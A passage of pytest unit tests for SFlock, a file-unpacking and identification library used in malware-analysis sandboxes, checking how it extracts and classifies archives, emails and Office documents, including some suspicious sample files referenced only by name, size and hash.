51 |         t = CabFile(f("garbage.bin"))
52 |         assert t.handles() is False
53 |         assert not t.f.selected
54 |         with pytest.raises(UnpackException) as e:
55 |             t.unpack()
56 |         assert e.value.state == Errors.NOTHING_EXTRACTED
57 | 
58 | @pytest.mark.skipif("CabFile(None).supported()")
59 | def test_nocab_plain():
60 |     assert "Microsoft Cabinet archive" in f("cab2.cab").magic
61 |     t = CabFile(f("cab2.cab"))
62 |     assert t.handles() is True
63 |     assert not t.f.selected
64 | 


--------------------------------------------------------------------------------
/tests/test_daa.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2018 Hatching B.V>
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os.path
 6 | import pytest
 7 | 
 8 | from sflock.abstracts import File
 9 | from sflock.main import unpack
10 | from sflock.unpack import DaaFile
11 | 
12 | def f(filename):
13 |     return File.from_path(os.path.join("tests", "files", filename))
14 | 
15 | @pytest.mark.skipif("not DaaFile(None).supported()")
16 | class TestDaaFile(object):
17 |     def test_daa(self):
18 |         assert "PowerISO Direct-Access-Archive" in f("quota.daa").magic
19 |         t = DaaFile(f("quota.daa"))
20 |         assert t.handles() is True
21 |         assert not t.f.selected
22 |         files = list(t.unpack())
23 |         assert len(files) == 1
24 |         assert not files[0].filepath
25 |         assert files[0].relapath == "Revised-Quote.exe"
26 |         assert files[0].filesize == 791040
27 |         assert "PE32" in files[0].magic
28 |         assert files[0].parentdirs == []
29 |         assert files[0].selected is True
30 | 


--------------------------------------------------------------------------------
/tests/test_decode.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | from sflock.abstracts import File
 6 | from sflock.decode.office import Office
 7 | from sflock.errors import Errors
 8 | from sflock.main import unpack
 9 | 
10 | def f(filename):
11 |     return File.from_path("tests/files/%s" % filename)
12 | 
13 | def f2(filename):
14 |     return "tests/files/%s" % filename
15 | 
16 | def test_decode_docx():
17 |     assert Office(f("encrypted1.docx"), "Password1234_").decode().magic in (
18 |         "Microsoft Word 2007+", "Zip archive data, at least v2.0 to extract"
19 |     )
20 |     # Invalid password provided.
21 |     assert Office(f("encrypted1.docx"), "Password12345").decode() is False
22 | 
23 | def test_decode_regular():
24 |     assert Office(f("maldoc/0882c8"), "").decode() is None
25 | 
26 | def test_passwords():
27 |     f = unpack(f2("zip_encrypted.zip"))
28 |     assert len(f.children) == 1
29 |     assert f.children[0].filesize == 21
30 | 
31 |     # Give no password. Should result in error
32 |     z = unpack(f2("zip_encrypted2.zip"))
33 |     assert z.mode == Errors.DECRYPTION_FAILED
34 | 
35 |     z = unpack(f2("zip_encrypted2.zip"), password="sflock")
36 |     assert z.children[0].magic == "ASCII text"
37 | 
38 |     z = unpack(f2("zip_encrypted2.zip"), password=["sflock"])
39 |     assert z.children[0].magic == "ASCII text"
40 | 
41 | def test_decode_xlsx():
42 |     z = unpack(f2("xlsx_encoded.xlsx")).children
43 |     assert len(z) == 2
44 |     filenames = [x.filename for x in z]
45 |     assert "EncryptionInfo" in filenames
46 |     assert "EncryptedPackage" in filenames


--------------------------------------------------------------------------------
/tests/test_elf.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | from sflock.main import unpack
 6 | 
 7 | def test_elf():
 8 |     elf = unpack("tests/files/busybox-i686")
 9 |     assert elf.platforms == [{"platform": "linux", "os_version": ""},]
10 | 


--------------------------------------------------------------------------------
/tests/test_eml.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
  2 | # This file is part of SFlock - http://www.sflock.org/.
  3 | # See the file 'docs/LICENSE.txt' for copying permission.
  4 | 
  5 | import mock
  6 | import os.path
  7 | import pytest
  8 | import re
  9 | 
 10 | from sflock.abstracts import File
 11 | from sflock.unpack import EmlFile
 12 | 
 13 | def f(filename):
 14 |     return File.from_path(os.path.join("tests", "files", filename))
 15 | 
 16 | def test_eml_tar_nested2():
 17 |     assert "smtp mail" in f("eml_tar_nested2.eml").magic.lower()
 18 |     t = EmlFile(f("eml_tar_nested2.eml"))
 19 |     assert t.handles() is True
 20 |     files = list(t.unpack())
 21 | 
 22 |     assert len(files) == 1
 23 |     assert not files[0].filepath
 24 |     assert files[0].relapath == "tar_nested2.tar"
 25 |     assert "POSIX tar" in files[0].magic
 26 |     assert not files[0].selected
 27 | 
 28 |     assert len(files[0].children) == 1
 29 |     assert files[0].children[0].contents == b"hello world\n"
 30 |     assert files[0].children[0].magic == "ASCII text"
 31 |     assert files[0].children[0].parentdirs == ["deepfoo", "foo"]
 32 |     assert not files[0].children[0].selected
 33 | 
 34 | def test_eml_nested_eml():
 35 |     assert "MIME entity" in f("eml_nested_eml.eml").magic
 36 |     t = EmlFile(f("eml_nested_eml.eml"))
 37 |     assert t.handles() is True
 38 |     assert t.f.selected
 39 |     files = list(t.unpack())
 40 |     assert len(files) == 2
 41 | 
 42 |     assert not files[0].filepath
 43 |     assert files[0].relapath == "multipart.eml"
 44 |     assert "ASCII text" in files[0].magic
 45 |     assert len(files[0].children) == 2
 46 |     assert files[0].selected
 47 | 
 48 |     assert not files[0].children[0].filepath
 49 |     assert files[0].children[0].relapath == u"\u60e1\u610f\u8edf\u9ad4.doc"
 50 |     assert files[0].children[0].filesize == 12
 51 |     assert files[0].children[0].extension == "txt"
 52 |     assert files[0].children[0].platforms == [
 53 |                         {"platform": "windows", "os_version": ""},
 54 |                         {"platform": "darwin", "os_version": ""},
 55 |                         {"platform": "linux", "os_version": ""},
 56 |                         {"platform": "android", "os_version": ""},
 57 |                         {"platform": "ios", "os_version": ""}
 58 |                     ]
 59 |     assert files[0].children[0].selected is False
 60 | 
 61 |     assert not files[0].children[1].filepath
 62 |     assert files[0].children[1].relapath == "cuckoo.png"
 63 |     assert files[0].children[1].filesize == 11970
 64 |     assert files[0].children[1].extension == "png"
 65 |     assert files[0].children[1].platforms == [
 66 |                         {"platform": "windows", "os_version": ""},
 67 |                         {"platform": "darwin", "os_version": ""},
 68 |                         {"platform": "linux", "os_version": ""},
 69 |                         {"platform": "android", "os_version": ""},
 70 |                         {"platform": "ios", "os_version": ""}
 71 |                     ]
 72 |     assert not files[0].children[1].selected
 73 | 
 74 |     assert files[1].relapath == "att1"
 75 |     assert "UTF-8 Unicode" in files[1].magic
 76 |     assert files[1].contents == b"\xe6\x83\xa1\xe6\x84\x8f\xe8\xbb\x9f\xe9\xab\x94"
 77 |     assert files[1].extension == "txt"
 78 |     assert files[1].platforms == [
 79 |                         {"platform": "windows", "os_version": ""},
 80 |                         {"platform": "darwin", "os_version": ""},
 81 |                         {"platform": "linux", "os_version": ""},
 82 |                         {"platform": "android", "os_version": ""},
 83 |                         {"platform": "ios", "os_version": ""}
 84 |                     ]
 85 |     assert not files[1].selected
 86 | 
 87 | def test_faulty_eml():
 88 |     assert f("eml_faulty.eml_").magic in ("data", "RFC 822 mail text")
 89 |     t = EmlFile(f("eml_faulty.eml_"))
 90 |     assert t.handles() is True
 91 |     files = list(t.unpack())
 92 |     assert files[0].children[0].filename == "DOC1820617988-PDF.vbs"
 93 |     assert files[0].children[0].filesize == 89851
 94 | 
 95 | def test_eml_exception():
 96 |     """We must ensure that re.compile is restored at all times."""
 97 |     re_compile = re.compile
 98 |     EmlFile(f("eml_faulty.eml_")).unpack()
 99 |     assert re.compile == re_compile
100 | 
101 |     with mock.patch("email.message_from_string", side_effect=Exception('test_exception')):
102 |         with pytest.raises(Exception) as e:
103 |             EmlFile(f("eml_faulty.eml_")).unpack()
104 |         e.match("test_exception")
105 |     assert re.compile == re_compile
106 | 
107 | def test_garbage():
108 |     t = EmlFile(f("garbage.bin"))
109 |     assert t.handles() is False
110 |     assert not t.f.selected
111 |     assert not t.unpack()
112 | 


--------------------------------------------------------------------------------
/tests/test_exts.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os.path
 6 | 
 7 | from sflock.abstracts import File, Unpacker
 8 | 
 9 | def guess(file):
10 |     return sorted(list(Unpacker.guess(file)))
11 | 
12 | def f(filename):
13 |     return File.from_path(os.path.join("tests", "files", filename))
14 | 
15 | def test_extensions():
16 |     assert guess(f("tar_plain.tar")) == ["tarfile"]
17 |     assert guess(f("tar_plain2.tar.gz")) == ["targzfile"]
18 |     assert guess(f("tar_plain2.tar.bz2")) == ["tarbz2file"]
19 |     assert guess(f("zip_plain.zip")) == ["7zfile", "zipfile"]
20 |     assert guess(f("rar_plain.rar")) == ["rarfile"]
21 |     assert guess(f("7z_plain.7z")) == ["7zfile"]
22 |     assert guess(f("ace_plain.ace")) == ["acefile"]
23 |     assert guess(f("eml_nested_eml.eml")) == ["emlfile"]
24 |     assert guess(f("msg_invoice.msg")) == ["msgfile"]
25 |     assert guess(f("oledata.mso")) == ["msofile"]
26 |     assert "bupfile" in guess(f("bup_test.bup"))
27 |     assert guess(f("test.lzh")) == ["lzhfile"]
28 |     assert guess(f("randomfile.lha")) == ["lzhfile"]
29 |     assert guess(f("gzip1.gzip")) == ["gzipfile", "targzfile"]
30 | 
31 | def test_case():
32 |     assert guess(f("ZIP_PLAIN.ZIP")) == ["7zfile", "zipfile"]
33 | 


--------------------------------------------------------------------------------
/tests/test_file.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import io
 6 | import os
 7 | import tempfile
 8 | 
 9 | from sflock.abstracts import File
10 | from sflock.main import unpack
11 | 
12 | def test_temp_path():
13 |     filepath = File(contents=b"foo").temp_path()
14 |     assert open(filepath, "rb").read() == b"foo"
15 | 
16 |     filepath = File(stream=io.BytesIO(b"bar")).temp_path()
17 |     assert open(filepath, "rb").read() == b"bar"
18 | 
19 | def test_stream():
20 |     f = File(contents=b"foo1")
21 |     assert f.filesize == 4
22 |     assert f.stream.read() == b"foo1"
23 | 
24 |     f = File(stream=io.BytesIO(b"foo2"))
25 |     assert f.filesize == 4
26 |     assert f.stream.read() == b"foo2"
27 | 
28 |     fd, filepath = tempfile.mkstemp()
29 |     os.write(fd, b"foobar")
30 |     os.close(fd)
31 | 
32 |     f = File(stream=open(filepath, "rb"))
33 |     assert f.filesize == 6
34 |     assert f.stream.read() == b"foobar"
35 |     assert f.sha256.startswith("c3ab8ff13720e8ad9047")
36 | 
37 |     f = File(stream=io.BytesIO(b"hello world"))
38 |     assert f.stream.read() == b"hello world"
39 |     assert f.stream.read(5) == b"hello"
40 | 
41 |     f = File(stream=io.BytesIO(b"hello world"))
42 |     s = f.stream
43 |     assert s.read(6) == b"hello "
44 |     assert s.read() == b"world"
45 |     assert f.sha256.startswith("b94d27b9934d3e08a52e52d7da7da")
46 | 
47 | def test_has_child():
48 |     f = unpack("tests/files/doc_1.docx_")
49 |     assert f.get_child("[Content_Types].xml") is not None
50 |     assert f.get_child("docProps/app.xml") is not None
51 |     assert f.get_child("docProps/.*\\.xml$", True) is not None
52 |     assert f.get_child("docProps/.*\\.xmk", True) is None
53 | 


--------------------------------------------------------------------------------
/tests/test_ident.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
  2 | # This file is part of SFlock - http://www.sflock.org/.
  3 | # See the file 'docs/LICENSE.txt' for copying permission.
  4 | 
  5 | import os
  6 | import tempfile
  7 | 
  8 | from sflock.main import unpack
  9 | 
 10 | def test_empty():
 11 |     fd, filepath = tempfile.mkstemp()
 12 |     os.close(fd)
 13 |     assert unpack(filepath).extension == ""
 14 |     assert unpack(filepath).platforms == []
 15 | 
 16 | def test_identify():
 17 |     f = unpack(contents=open("tests/files/sample.jar", "rb").read())
 18 |     assert f.extension == "jar"
 19 | 
 20 |     f = unpack(contents=open("tests/files/sample.apk", "rb").read())
 21 |     assert f.extension == "apk"
 22 | 
 23 | def test_pptx():
 24 |     f = unpack(contents=open("tests/files/pptx_1.pptx", "rb").read())
 25 |     assert f.duplicate is False
 26 |     assert f.selected
 27 |     assert f.extension == "pptx"
 28 |     assert f.platforms == [
 29 |                         {"platform": "windows", "os_version": ""},
 30 |                         {"platform": "darwin", "os_version": ""},
 31 |                         {"platform": "linux", "os_version": ""},
 32 |                         {"platform": "android", "os_version": ""},
 33 |                         {"platform": "ios", "os_version": ""}
 34 |                     ]
 35 |     assert f.get_child("[Content_Types].xml") is not None
 36 |     assert len(f.children) == 37
 37 | 
 38 | def test_doc1():
 39 |     f = unpack("tests/files/doc_1.docx_")
 40 |     assert f.duplicate is False
 41 |     assert f.selected is True
 42 |     assert f.extension == "docx"
 43 |     assert f.platforms == [
 44 |                         {"platform": "windows", "os_version": ""},
 45 |                         {"platform": "darwin", "os_version": ""},
 46 |                         {"platform": "linux", "os_version": ""},
 47 |                         {"platform": "android", "os_version": ""},
 48 |                         {"platform": "ios", "os_version": ""}
 49 |                     ]
 50 |     assert f.get_child("[Content_Types].xml") is not None
 51 |     assert len(f.children) == 12
 52 |     assert f.children[0].selected == True
 53 |     assert f.children[4].selected == False
 54 |     assert f.children[8].selected == False
 55 |     assert f.children[11].selected == False
 56 | 
 57 | def test_doc2():
 58 |     f = unpack("tests/files/doc_2.xlsx_")
 59 |     assert f.duplicate is False
 60 |     assert f.selected is True
 61 |     assert f.extension == "xlsm"
 62 |     assert f.platforms == [
 63 |                         {"platform": "windows", "os_version": ""},
 64 |                         {"platform": "darwin", "os_version": ""},
 65 |                         {"platform": "linux", "os_version": ""},
 66 |                         {"platform": "android", "os_version": ""},
 67 |                         {"platform": "ios", "os_version": ""}
 68 |                     ]
 69 |     assert f.get_child("[Content_Types].xml") is not None
 70 |     assert len(f.children) == 12
 71 |     assert f.children[0].selected == True
 72 |     assert f.children[11].selected == False
 73 | 
 74 | def test_oledoc1():
 75 |     f = unpack("tests/files/oledoc1.doc_")
 76 |     assert f.extension == "doc"
 77 |     assert f.platforms == [
 78 |                         {"platform": "windows", "os_version": ""},
 79 |                         {"platform": "darwin", "os_version": ""},
 80 |                         {"platform": "linux", "os_version": ""},
 81 |                         {"platform": "android", "os_version": ""},
 82 |                         {"platform": "ios", "os_version": ""}
 83 |                     ]
 84 | 
 85 | def test_url():
 86 |     f = unpack("tests/files/1.url")
 87 |     assert f.extension == "url"
 88 |     assert f.platforms == [{"platform": "windows", "os_version": ""}]
 89 | 
 90 | def test_slk():
 91 |     f = unpack("tests/files/1.slk")
 92 |     assert f.extension == "slk"
 93 |     assert f.platforms == [
 94 |                         {"platform": "windows", "os_version": ""},
 95 |                         {"platform": "darwin", "os_version": ""},
 96 |                         {"platform": "linux", "os_version": ""},
 97 |                         {"platform": "android", "os_version": ""},
 98 |                         {"platform": "ios", "os_version": ""}
 99 |                     ]
100 | 
101 | def test_iqy():
102 |     f = unpack("tests/files/1.iqy")
103 |     assert f.extension == "iqy"
104 |     assert f.platforms == [
105 |                         {"platform": "windows", "os_version": ""},
106 |                         {"platform": "darwin", "os_version": ""},
107 |                         {"platform": "linux", "os_version": ""},
108 |                         {"platform": "android", "os_version": ""},
109 |                         {"platform": "ios", "os_version": ""}
110 |                     ]
111 | 


--------------------------------------------------------------------------------
/tests/test_identify.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2017-2020 Jurriaan Bremer.
  2 | # This file is part of SFlock - http://www.sflock.org/.
  3 | # See the file 'docs/LICENSE.txt' for copying permission.
  4 | 
  5 | import os
  6 | 
  7 | from sflock.main import unpack
  8 | 
  9 | path = os.path.join("tests", "files", "extension")
 10 | 
 11 | def _help(extension):
 12 |     files = os.listdir(os.path.join(path, extension))
 13 |     try:
 14 |         files.remove(".gitkeep")
 15 |     except ValueError:
 16 |         pass
 17 |     if len(files) < 1:
 18 |         raise ValueError(
 19 |             f"Identify test type: '{extension}' has 0 file to test with"
 20 |         )
 21 |     for sample in files:
 22 |         if sample.startswith("."):
 23 |             continue
 24 |         f = unpack(
 25 |             filepath=os.path.join(
 26 |                     path, extension, sample
 27 |                 )
 28 |         )
 29 | 
 30 |         try:
 31 |             assert f.extension == extension
 32 |         except AssertionError as e:
 33 |             raise AssertionError(
 34 |                 "Sample: %s. Expected: %s, Received: %s, Magic: %s, Mime: %s" % (
 35 |                     sample, extension, f.extension, f.magic, f.mime
 36 |                 )
 37 |             ) from e
 38 | 
 39 | def test_7z():
 40 |     _help("7z")
 41 | 
 42 | def test_ace():
 43 |     _help("ace")
 44 | 
 45 | def test_apk():
 46 |     _help("apk")
 47 | 
 48 | def test_bat():
 49 |     _help("bat")
 50 | 
 51 | def test_cab():
 52 |     _help("cab")
 53 | 
 54 | def test_daa():
 55 |     _help("daa")
 56 | 
 57 | def test_dll():
 58 |     _help("dll")
 59 | 
 60 | def test_doc():
 61 |     _help("doc")
 62 | 
 63 | def test_docm():
 64 |     _help("docm")
 65 | 
 66 | def test_docx():
 67 |     _help("docx")
 68 | 
 69 | def test_dotm():
 70 |     _help("dotm")
 71 | 
 72 | def test_dotx():
 73 |     _help("dotx")
 74 | 
 75 | def test_elf():
 76 |     _help("elf")
 77 | 
 78 | def test_eml():
 79 |     _help("eml")
 80 | 
 81 | def test_mht():
 82 |     _help("mht")
 83 | 
 84 | def test_exe():
 85 |     _help("exe")
 86 | 
 87 | def test_hta():
 88 |     _help("hta")
 89 | 
 90 | def test_html():
 91 |     _help("html")
 92 | 
 93 | def test_hwp():
 94 |     _help("hwp")
 95 | 
 96 | def test_iqy():
 97 |     _help("iqy")
 98 | 
 99 | def test_iso():
100 |     _help("iso")
101 | 
102 | def test_jar():
103 |     _help("jar")
104 | 
105 | def test_js():
106 |     _help("js")
107 | 
108 | def test_lnk():
109 |     _help("lnk")
110 | 
111 | def test_msg():
112 |     _help("msg")
113 | 
114 | def test_msi():
115 |     _help("msi")
116 | 
117 | def test_ods():
118 |     _help("ods")
119 | 
120 | def test_odt():
121 |     _help("odt")
122 | 
123 | def test_pdf():
124 |     _help("pdf")
125 | 
126 | def test_ppsm():
127 |     _help("ppsm")
128 | 
129 | def test_ppsx():
130 |     _help("ppsx")
131 | 
132 | def test_ppt():
133 |     _help("ppt")
134 | 
135 | def test_pptm():
136 |     _help("pptm")
137 | 
138 | def test_pptx():
139 |     _help("pptx")
140 | 
141 | def test_ps1():
142 |     _help("ps1")
143 | 
144 | def test_py():
145 |     _help("py")
146 | 
147 | def test_rar():
148 |     _help("rar")
149 | 
150 | def test_rtf():
151 |     _help("rtf")
152 | 
153 | def test_slk():
154 |     _help("slk")
155 | 
156 | def test_txt():
157 |     _help("txt")
158 | 
159 | def test_url():
160 |     _help("url")
161 | 
162 | def test_vbs():
163 |     _help("vbs")
164 | 
165 | def test_wsf():
166 |     _help("wsf")
167 | 
168 | def test_xls():
169 |     _help("xls")
170 | 
171 | def test_xlsb():
172 |     _help("xlsb")
173 | 
174 | def test_xlsm():
175 |     _help("xlsm")
176 | 
177 | def test_xlam():
178 |     _help("xlam")
179 | 
180 | def test_xlsx():
181 |     _help("xlsx")
182 | 


--------------------------------------------------------------------------------
/tests/test_lzh.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2018 Jurriaan Bremer.
 2 | # Copyright (C) 2019 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | import os.path
 7 | import pytest
 8 | 
 9 | from sflock.abstracts import File
10 | from sflock.unpack import LzhFile
11 | 
12 | def f(filename):
13 |     return File.from_path(os.path.join("tests", "files", filename))
14 | 
15 | @pytest.mark.skipif("not LzhFile(None).supported()")
16 | class TestLzhFile(object):
17 |     def test_lzh_plain(self):
18 |         assert "LHa (" in f("test.lzh").magic
19 |         t = LzhFile(f("test.lzh"))
20 |         assert t.handles() is True
21 |         assert not t.f.selected
22 |         files = list(t.unpack())
23 |         assert len(files) == 1
24 |         assert not files[0].filepath
25 |         assert files[0].relapath == "MICROTECH%20PRECISION%20ENGINEERING.exe"
26 |         assert len(files[0].contents) == 652288
27 |         assert "PE32 executable" in files[0].magic
28 |         assert not files[0].parentdirs
29 |         assert files[0].selected is True
30 | 


--------------------------------------------------------------------------------
/tests/test_magic.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | from sflock import magic
 7 | 
 8 | def test_magic():
 9 |     assert magic.from_file("tests/files/maldoc.xls").startswith((
10 |         "Composite Document File V2", "CDF V2 Document"
11 |     ))
12 |     assert magic.from_file("tests/files/test.hta_").startswith(
13 |         "HTML document"
14 |     )
15 |     assert magic.from_file("tests/files/cab2.cab").startswith(
16 |         "Microsoft Cabinet"
17 |     )
18 | 
19 | def test_magic_exception():
20 |     assert magic.from_file(
21 |         "tests/files/invld.elf_"
22 |     ).startswith("ELF")
23 |     assert magic.from_buffer(
24 |         open("tests/files/invld.elf_", "rb").read()
25 |     ).startswith("ELF")
26 | 


--------------------------------------------------------------------------------
/tests/test_main.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import pytest
 6 | 
 7 | from sflock.exception import IncorrectUsageException
 8 | from sflock.main import supported, unpack
 9 | from sflock.unpack import AceFile, CabFile, RarFile, Zip7File, DaaFile, VHDFile
10 | 
11 | def test_supported():
12 |     assert supported()
13 | 
14 | def test_count_supported():
15 |     count = 11
16 | 
17 |     if DaaFile(None).supported():
18 |         count += 1
19 | 
20 |     if VHDFile(None).supported():
21 |         count += 2
22 | 
23 |     if AceFile(None).supported():
24 |         count += 1
25 | 
26 |     if CabFile(None).supported():
27 |         count += 1
28 | 
29 |     if RarFile(None).supported():
30 |         count += 1
31 | 
32 |     if Zip7File(None).supported():
33 |         count += 5
34 | 
35 |     assert count == len(supported())
36 | 
37 | def test_unpack_py3():
38 |     with pytest.raises(IncorrectUsageException):
39 |         unpack(filepath=b"filepath")
40 | 
41 |     with pytest.raises(IncorrectUsageException):
42 |         unpack(contents="contents")
43 | 
44 |     with pytest.raises(IncorrectUsageException):
45 |         unpack(password=b"password")
46 | 
47 |     with pytest.raises(IncorrectUsageException):
48 |         unpack(filename=b"filename")
49 | 
50 |     # It works, but no children are extracted from this Python file.
51 |     assert not unpack(__file__).children
52 | 


--------------------------------------------------------------------------------
/tests/test_misc.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | from sflock.misc import make_list
 7 | 
 8 | def test_make_list():
 9 |     assert make_list(None) == [None]
10 |     assert make_list([]) == []
11 |     assert make_list(()) == []
12 |     assert make_list(1) == [1]
13 |     assert make_list("a") == ["a"]
14 |     assert make_list((1, 2)) == [1, 2]
15 |     assert make_list([3, 4]) == [3, 4]
16 | 


--------------------------------------------------------------------------------
/tests/test_msg.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import hashlib
 6 | import io
 7 | import os.path
 8 | import zipfile
 9 | 
10 | from sflock import unpack, zipify
11 | from sflock.abstracts import File
12 | from sflock.errors import Errors
13 | from sflock.unpack import MsgFile
14 | 
15 | def f(filename):
16 |     return File.from_path(os.path.join("tests", "files", filename))
17 | 
18 | def test_msg_embedded():
19 |     assert f("msg_invoice.msg").magic.startswith((
20 |         "Composite Document File V2", "CDF V2 Document", "CDFV2 Microsoft",
21 |     ))
22 |     m = MsgFile(f("msg_invoice.msg"))
23 |     assert m.handles() is True
24 |     assert not m.f.selected
25 |     files = list(m.unpack())
26 | 
27 |     assert len(files) == 3
28 |     assert not files[0].filepath
29 |     assert files[0].relapath == "image003.emz"
30 |     assert files[0].filesize == 1137
31 |     assert not files[0].children
32 |     assert not files[0].selected
33 | 
34 |     assert not files[1].filepath
35 |     assert files[1].relapath == "image004.png"
36 |     assert files[1].filesize == 1132
37 |     assert not files[1].children
38 |     assert not files[1].selected
39 | 
40 |     assert not files[2].filepath
41 |     assert files[2].relapath == "oledata.mso"
42 |     assert files[2].filesize == 234898
43 |     assert files[2].platforms == []
44 |     assert not files[2].selected
45 | 
46 |     assert len(files[2].children) == 1
47 |     assert not files[2].children[0].filepath
48 |     assert files[2].children[0].relapath == "Firefox Setup Stub 43.0.1.exe"
49 |     assert files[2].children[0].filesize == 249336
50 |     assert files[2].children[0].selected
51 | 
52 |     assert hashlib.md5(
53 |         files[2].children[0].contents
54 |     ).hexdigest() == "c8cd8eb88f1848cf456725d67baaaa35"
55 | 
56 | def test_msg_nullbyte():
57 |     f = unpack("tests/files/ole_nullbyte.zip")
58 |     assert len(f.children) == 1
59 |     assert len(f.children[0].children) == 2
60 | 
61 |     ole = f.children[0]
62 |     assert ole.filename == "You have recevied a message.msg"
63 |     assert f.read(ole.extrpath) == ole.contents
64 | 
65 |     doc = ole.children[0]
66 |     assert doc.filename == "eFax_document-4631559.doc"
67 |     assert doc.relapath == "eFax_document-4631559.doc\x00"
68 |     assert doc.relaname == "eFax_document-4631559.doc"
69 | 
70 |     z = zipfile.ZipFile(io.BytesIO(zipify(ole)))
71 |     assert z.read(doc.relaname) == doc.contents
72 | 
73 | def test_msg_doc_magic():
74 |     f = unpack("tests/files/msg_doc.msg_")
75 |     assert len(f.children) == 1
76 |     assert f.children[0].filename == "Kristina_Meyer.doc"
77 |     assert f.children[0].filesize == 57856
78 | 
79 | def test_msg_rtf_magic():
80 |     f = unpack("tests/files/msg_rtf.msg_")
81 |     assert len(f.children) == 1
82 |     assert f.children[0].filename == "g94ys83xi8_8fb0ud5,7.rtf"
83 |     assert f.children[0].filesize == 138638
84 | 
85 | def test_garbage():
86 |     m = MsgFile(f("garbage.bin"))
87 |     assert m.handles() is False
88 |     assert not m.f.selected
89 |     assert not m.unpack()
90 |     assert m.f.mode == Errors.UNPACK_FAILED
91 | 


--------------------------------------------------------------------------------
/tests/test_mso.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os.path
 6 | 
 7 | from sflock.abstracts import File
 8 | from sflock.errors import Errors
 9 | from sflock.unpack import MsoFile
10 | 
11 | def f(filename):
12 |     return File.from_path(os.path.join("tests", "files", filename))
13 | 
14 | def test_unpack():
15 |     msofile = f("oledata.mso")
16 |     children = MsoFile(msofile).unpack()
17 |     assert len(children) == 1
18 |     assert children[0].filename == "Firefox Setup Stub 43.0.1.exe"
19 | 
20 | def test_garbage():
21 |     m = MsoFile(f("garbage.bin"))
22 |     assert m.handles() is False
23 |     assert not m.f.selected
24 |     assert not m.unpack()
25 |     assert m.f.mode == Errors.UNPACK_FAILED
26 | 


--------------------------------------------------------------------------------
/tests/test_office.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os.path
 6 | import pytest
 7 | 
 8 | from sflock.abstracts import File
 9 | from sflock.main import unpack
10 | from sflock.unpack import OfficeFile
11 | 
12 | def f(filename):
13 |     return File.from_path(os.path.join("tests", "files", filename))
14 | 
15 | class TestOfficeFile(object):
16 |     def test_office_plain(self):
17 |         z = OfficeFile(f("maldoc.xls"))
18 |         assert z.handles() is True
19 |         assert not z.unpack()
20 |         # Don't test z.f.selected / z.f.preview here as that logic isn't
21 |         # performed by OfficeFile(), but rather the SFlock core.
22 | 
23 |     def test_office_plain2(self):
24 |         f = unpack("tests/files/maldoc.xls")
25 |         assert f.selected is True
26 | 
27 |     def test_office_pw_failure(self):
28 |         z = OfficeFile(f("encrypted1.docx"))
29 |         assert z.handles() is True
30 |         assert not z.unpack()
31 |         # TODO Failure to decrypt should also unselect the file.
32 |         assert z.f.selected is False
33 | 
34 |     def test_office_pw_success(self):
35 |         z = OfficeFile(f("encrypted1.docx"))
36 |         assert z.handles() is True
37 |         d, = z.unpack(password="Password1234_")
38 |         assert z.f.selected is False
39 |         assert d.magic.startswith(("Microsoft Word 2007+", "Zip archive data"))
40 |         assert d.extension == "docx"
41 |         assert d.selected is True
42 | 


--------------------------------------------------------------------------------
/tests/test_pdf.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | import io
 7 | import os.path
 8 | import zipfile
 9 | 
10 | from sflock.abstracts import File
11 | from sflock.unpack import PdfFile, ZipFile
12 | 
13 | def f(filename):
14 |     return File.from_path(os.path.join("tests", "files", filename))
15 | 
